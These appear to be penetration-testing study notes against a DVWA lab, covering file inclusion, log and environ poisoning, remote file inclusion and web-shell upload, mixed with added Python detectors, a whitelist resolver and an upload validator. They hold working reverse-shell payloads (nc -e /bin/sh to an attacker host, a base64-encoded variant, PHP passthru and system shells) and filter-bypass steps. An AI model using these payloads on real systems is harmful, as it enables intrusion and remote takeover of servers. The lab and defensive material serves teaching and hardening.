
File Inclusion


http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd  --> reads /etc/passwd (local file inclusion via directory traversal; this gives the list of accounts and shells, the password hashes live in /etc/shadow, which the web server user normally cannot read)

-------------------------------------------------------------------------------------------------------
     WEB TERMINAL ACCESS USING FILE INCLUSION      ==========================      using environment variables (/proc/self/environ)
---------------------------------------------------------------------------------------------------------

cat /proc/self/environ --> shows the environment variables of the process that reads the file

Opening the environment variables of the web server process through the vulnerable page
 --> http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ
With PHP running as CGI (this DVWA box uses /etc/php5/cgi/php.ini) the request headers show up there as CGI variables such as HTTP_USER_AGENT. That is what the next step relies on: whatever we put in the User-Agent header is written into the file that the page then includes and interprets as PHP.

Now intercept the request using Burp Suite -
replace the User-Agent header ("browser name") with PHP code, first a harmless probe: <?php phpinfo(); ?>
(the notes originally used the short tag form <?phpinfo()?>, which only works when short_open_tag is On in php.ini; <?php ... ?> works regardless)
If the phpinfo output appears in the included environ, the injected code is being executed.

On the attacker machine start a listener in the command prompt
 --> nc -vv -l -p 8888
then resend the request with the User-Agent header set to a reverse shell
 --> <?php passthru("nc -e /bin/sh attacker_ip 8888"); ?>   // <?php passthru("nc -e /bin/sh 192.168.149.128 8888"); ?>
(nc -e needs a netcat build on the target that supports it, e.g. netcat-traditional; the OpenBSD netcat has no -e option)



-------------------------------------------------------------------------------------------------------
WEB TERMINAL ACCESS USING FILE INCLUSION ============================================ using logs --> /var/log/auth.log
                                                                                                  --> /var/log/apache2/access.log
---------------------------------------------------------------------------------------------------------
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log
--> /var/log/auth.log holds the authentication logs (sshd, sudo, PAM); the file has to be readable by the web server user for this to work, which it is here. The same idea works with /var/log/apache2/access.log, where the User-Agent of every request is recorded.

--> let's try to log in to the server using "ssh" and check the log

ssh random@192.168.149.136
random
--> sshd records the failed attempt, including the username we supplied, in /var/log/auth.log. Because the username is written unmodified, it can carry PHP code.


ssh "<?php passthru('nc -e /bin/sh attacker_ip 8888');?>"@victim_IP

The slashes and spaces of the raw command are awkward inside a username and in the logged line, so encode the command as base64 and decode it at run time --> nc -e /bin/sh attacker_ip 8888
--> open Burp Suite, go to Decoder, paste: nc -e /bin/sh attacker_ip 8888  and encode as Base64
--> copy the encoded string: bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4   (substitute the real attacker IP before encoding)


ssh "<?php passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?>"@victim_IP


 --> in the command prompt on the attacker machine start the listener
nc -vv -l -p 8888


--> now open the page that includes the poisoned log; PHP parses the log file, reaches our tag in the sshd line and runs it, and the shell connects back to the listener

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=/../../../../../../../var/log/auth.log

--> in the netcat window type
 id
 ls
 pwd
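Added example, not part of these notes: a small Python detector (the code, the rule names and the sample lines are mine) that runs over constructed Apache access.log and sshd auth.log lines modelled on the two techniques above, the environ injection through User-Agent and the ssh username poisoning, and flags the traversal, the sensitive targets, the PHP tags and a remote URL in the page parameter. The lab IPs are reused from the notes; the timestamps and log lines are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (made up for this example; the lab IPs come from the notes above).
ACCESS_LOG = """\
192.168.149.128 - - [10/Mar/2024:10:01:02 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.149.128 - - [10/Mar/2024:10:01:09 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../etc/passwd HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
192.168.149.128 - - [10/Mar/2024:10:01:15 +0000] "GET /dvwa/vulnerabilities/fi/?page=/../../../../../../../proc/self/environ HTTP/1.1" 200 4410 "-" "<?php passthru('nc -e /bin/sh 192.168.149.128 8888'); ?>"
192.168.149.128 - - [10/Mar/2024:10:02:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt? HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

AUTH_LOG = """\
Mar 10 10:03:01 dvwa sshd[2211]: Invalid user random from 192.168.149.128
Mar 10 10:03:20 dvwa sshd[2215]: Invalid user <?php passthru(base64_decode('bmMgLWUgL2Jpbi9zaCBhdHRhY2tlcl9pcCA4ODg4'));?> from 192.168.149.128
Mar 10 10:04:00 dvwa sshd[2219]: Accepted publickey for deploy from 10.0.0.5 port 50222 ssh2
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators of the techniques in the notes above. The rule names are mine.
RULES = [
    ("traversal",      re.compile(r"\.\./|\.\.\\|%2e%2e", re.I)),
    ("sensitive-file", re.compile(r"/etc/(passwd|shadow)|/proc/self/environ|/var/log/", re.I)),
    # any URL scheme right after page= : http://, hTTp://, php://, data:, expect://
    ("remote-include", re.compile(r"[?&]page=[a-z][a-z0-9+.\-]*:", re.I)),
    # PHP open tag: <?php ..., <?= ..., or a short tag followed directly by a call such as <?passthru(
    ("php-tag",        re.compile(r"<\?(?:php\b|=|\s*[a-z_]+\s*\()", re.I)),
]


def _matching_rules(*fields: str) -> list:
    """Sorted names of every rule that fires on any of the given strings."""
    hits = set()
    for text in fields:
        for name, rx in RULES:
            if rx.search(text):
                hits.add(name)
    return sorted(hits)


def scan_access_log(text: str) -> list:
    """Flag access.log entries whose path, referer or User-Agent carry inclusion indicators."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess at the fields
        rules = _matching_rules(unquote(m["path"]), m["referer"], m["ua"])
        if rules:
            findings.append({"line": n, "ip": m["ip"], "rules": rules})
    return findings


def scan_auth_log(text: str) -> list:
    """Flag auth.log entries that carry a PHP tag or other indicators (poisoned usernames)."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        rules = _matching_rules(line)
        if rules:
            findings.append({"line": n, "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(ACCESS_LOG):
        print("access.log", f)
    for f in scan_auth_log(AUTH_LOG):
        print("auth.log  ", f)
```

Run it as a script to print the findings. The reason the access.log scan looks at the User-Agent and referer fields and not only the path is that with log poisoning the payload never appears in the URL of the request that delivers it, only in a header, or, for the ssh variant, in sshd's own message.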


===========================================================================================================
- Remote File Inclusion - Low Security -----------------------------
===========================================================================================================

It is a special case of file inclusion. If the server is configured with the php.ini options allow_url_fopen and allow_url_include set to On, the include() call fetches the file named in the parameter from any host we control and runs it on the target. The included file can hold any PHP, so we can run payloads, reverse shells and system commands. (Nothing is uploaded to the target; the code is fetched over HTTP at include time.)


In DVWA remote file inclusion is turned off by default (allow_url_include is Off), so to practise it we turn it on:

sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set both options to "On"
    allow_url_fopen = On
    allow_url_include = On
ctrl+x
yes
sudo /etc/init.d/apache2 restart


The payload file has to be served by a web server the target can reach (here the attacker machine 192.168.149.128; against a target on the internet that means a server with a routable address).


<?php
passthru("nc -e /bin/sh 192.168.149.128 8080");
?>

save it as reverse.txt in /var/www/html on the attacker machine (the .txt name matters: our own Apache serves it as plain text instead of executing it, so the target receives the PHP source)

check it is served: http://localhost/reverse.txt   --> it must also be reachable from the target, remotely if you are attacking a real server

in the command prompt start the listener
--> nc -vv -l -p 8080

now request the vulnerable page with the remote URL as the parameter (the trailing ? turns anything the application appends to the parameter into a query string for our server instead of part of the path, so reverse.txt is still what gets fetched)

http://192.168.149.136/dvwa/vulnerabilities/fi/?page=http://192.168.149.128/reverse.txt?

whoami
uname -a
ls
pwd


==========================================================================================================
-------------------------- Remote File Inclusion - Medium Security -------------
===========================================================================================================
The medium level strips the literal strings http:// and https:// from the parameter before including it. The strip is case-sensitive while URL schemes are not, so a mixed-case scheme passes the filter and PHP still fetches it:
 nc -vv -l -p 8080
http://192.168.149.136/dvwa/vulnerabilities/fi/?page=hTTp://192.168.149.128/reverse.txt?





Securing against remote file inclusion:


sudo nano /etc/php5/cgi/php.ini
ctrl+w --> search for allow_url and set it to "Off"
    allow_url_include = Off
ctrl+x
yes
sudo /etc/init.d/apache2 restart

This stops remote inclusion only. The local inclusion and log poisoning above still work with allow_url_include = Off; the real fix is in the application: never pass user input to include(), resolve the page parameter against a fixed list of allowed files instead.
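Added example, not from the notes or from DVWA's source: a Python model of both sides. weak_filter is my reconstruction of a strip-list check of the kind the mixed-case hTTp:// trick defeats (a single-pass, case-sensitive replace of http://, https:// and ../; an assumption about how the medium level is written, not its code), and resolve_safely is the whitelist-plus-containment handler recommended above. ALLOWED_PAGES and the base directory are assumed names. It goes one step beyond the notes by also showing that the same single-pass strip lets a nested ....// sequence through.

```python
import os
import re
from typing import Optional

# Pages the fi/ endpoint is meant to serve (assumed names, modelled on the lab's file1.php ... file3.php).
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}

# Any URL scheme in front of the value: http://, hTTp://, php://filter, data:, expect://
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)


def weak_filter(page: str) -> str:
    """Strip-list filter of the kind the hTTp:// trick defeats (my model, not DVWA's code).

    str.replace is case-sensitive and single-pass, so a case change in the
    scheme and a nested sequence such as ....// both survive it.
    """
    for bad in ("http://", "https://", "../", "..\\"):
        page = page.replace(bad, "")
    return page


def is_remote(page: str) -> bool:
    """True if the value starts with a URL scheme, whatever its case."""
    return SCHEME_RE.match(page) is not None


def resolve_safely(page: str, base_dir: str) -> Optional[str]:
    """Return the file to include, or None to reject the request.

    The whitelist is the real control: the parameter must equal one of the
    known page names, so no traversal, wrapper or URL can reach include().
    The realpath containment check is defence in depth for the day someone
    adds a path-like entry to the whitelist.
    """
    if is_remote(page) or page not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    base = "/var/www/html/dvwa/vulnerabilities/fi"  # assumed location of the vulnerable page
    for p in ("file1.php",
              "/../../../../../../../etc/passwd",
              "http://192.168.149.128/reverse.txt?",
              "hTTp://192.168.149.128/reverse.txt?",
              "....//....//etc/passwd"):
        print(f"{p!r:45} weak_filter -> {weak_filter(p)!r:40} safe -> {resolve_safely(p, base)}")
```

The whitelist lookup is an exact string comparison, so it needs no decoding, case folding or blacklist of bad substrings; everything that is not a known page name is rejected, which is why a null byte or a second encoding layer buys the attacker nothing here.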






File upload vulnerability:
--------------------------
Generate a web payload (PHP backdoor) and gain remote access:
--> weevely generate 12345 /root/Desktop/shell.php   // 12345 is the password
To connect to it after uploading
--> weevely link_of_shell password   // the URL the uploaded shell.php is served from, and the password given to generate
If the upload form only accepts images, change the extension of the file from php to jpg so the check passes

then modify the request using Burp Suite while uploading the file and change the extension back from jpg to php; an extension check that runs in the browser, or that looks only at the submitted filename, is bypassed this way
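Added example, mine, not from the notes or from weevely: a server-side upload check that shows why the rename trick works against checks that look only at the filename, and what a check that also inspects the content does. The accepted types, magic bytes and sample inputs are constructed for this example.

```python
import re
import secrets
from typing import Optional, Tuple

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes (magic numbers) of the image types we accept, mapped to their extension family.
MAGIC = (
    (b"\xff\xd8\xff", ".jpg"),
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
)
SAME_FAMILY = {".jpeg": ".jpg"}

# One name, one dot, a short alphabetic extension: rejects shell.php.jpg, shell.jpg%00.php, .htaccess
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z]{3,4}$")

# Constructed samples: a minimal JPEG header and a one-line PHP shell.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 24
SAMPLE_SHELL = b"<?php system($_GET['cmd']); ?>"


def sniff(content: bytes) -> Optional[str]:
    """Extension implied by the file's magic bytes, or None if it is not an image we accept."""
    for magic, ext in MAGIC:
        if content.startswith(magic):
            return ext
    return None


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Server-side decision on an upload: (accepted, reason or stored name).

    The filename is attacker-controlled, and so is the Content-Type header, so
    the only thing worth trusting is what the bytes actually are.
    """
    if not NAME_RE.match(filename):
        return False, "bad filename"
    ext = "." + filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"          # shell.php, as sent after the Burp edit
    actual = sniff(content)
    if actual is None or SAME_FAMILY.get(ext, ext) != actual:
        return False, "content is not a %s image" % ext  # shell.jpg: renamed PHP, not an image
    if b"<?" in content:
        return False, "embedded PHP tag"               # polyglot: valid JPEG with PHP in a comment segment
    # Never keep the client's name: store under a random name with the sniffed extension,
    # in a directory where the web server has PHP execution disabled.
    return True, secrets.token_hex(8) + actual


if __name__ == "__main__":
    for name, data in (("shell.php", SAMPLE_SHELL),
                       ("shell.jpg", SAMPLE_SHELL),
                       ("shell.php.jpg", SAMPLE_JPEG),
                       ("photo.jpg", SAMPLE_JPEG + SAMPLE_SHELL),
                       ("photo.jpg", SAMPLE_JPEG)):
        print(f"{name:15} -> {validate_upload(name, data)}")
```

Magic bytes only show that a file starts like an image; a production check should re-encode the upload with an image library and discard the original bytes, which also strips metadata and comment segments where a shell can hide. The random stored name and the no-execute upload directory are what make the "change the extension back to php" step useless even if a check is later weakened.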
